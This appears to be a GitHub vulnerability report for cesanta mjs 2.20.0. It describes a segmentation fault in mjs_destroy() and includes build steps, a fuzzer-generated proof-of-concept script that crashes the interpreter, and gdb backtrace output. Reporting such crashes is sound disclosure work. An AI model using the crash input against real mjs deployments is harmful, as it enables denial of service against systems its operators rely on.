SegFaultOnPc in mjs_destroy() at mjs.c:7563

Question

SegFaultOnPc in mjs_destroy() at mjs.c:7563

vorfreuder opened this issue a year ago · 0 comments

The name of an affected Product
mjs

The affected version
Commit: b1b6eac (Tag: 2.20.0)

Description
An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_destroy function in the mjs.c file.

Vulnerability Type
Segmentation fault on program counter

Environment

Operating System

Distributor ID: Ubuntu
Description:    Ubuntu 18.04.6 LTS
Release:        18.04
Codename:       bionic

Compiler

Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11
Target: x86_64-pc-linux-gnu
Thread model: posix

Steps to Reproduce

git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
clang -ggdb -O0 -DMJS_MAIN mjs.c -o mjs -ldl

poc

let i, a = 0, b0= 0, c = 0continu, d0, e = 0;

for (i = 8; i < 20; i++) {
  a let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify+=888 i;
c /= 0, c = 0let s = '08888888888888    true, "d": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify(o)AAA

run command

mjs -f poc

gdb info

Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563
7563      mbuf_free(&mjs->json_visited_stack);
(gdb) bt
#0  0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563
#1  0x000000000040d413 in mjs_exec_internal (mjs=0x1db2260, 
    path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1", 
    src=0x1db3cb0 "let i, a = 0, b0= 0, c = 0continu, d0, e = 0;\n\nfor (i = 8; i < 20; i++) {\n  a let z = JSON.parse('\"\"');  // Zlength string\nlet s2 = JSON.stringify+=888 i;\nc /= 0, c = 0let s = '0", '8' <repeats 13 times>, "    true,"..., generate_jsc=0, res=0x7ffd20341a58)
    at mjs.c:9044
#2  0x000000000040d4d5 in mjs_exec_file (mjs=0x1db2260, 
    path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1", 
    res=0x7ffd20341aa0) at mjs.c:9067
#3  0x000000000041082e in main (argc=3, argv=0x7ffd20341ba8) at mjs.c:11406
(gdb) list
7558      mbuf_free(&mjs->owned_strings);
7559      mbuf_free(&mjs->foreign_strings);
7560      mbuf_free(&mjs->owned_values);
7561      mbuf_free(&mjs->scopes);
7562      mbuf_free(&mjs->loop_addresses);
7563      mbuf_free(&mjs->json_visited_stack);
7564      free(mjs->error_msg);
7565      free(mjs->stack_trace);
7566      mjs_ffi_args_free_list(mjs);
7567      gc_arena_destroy(mjs, &mjs->object_arena);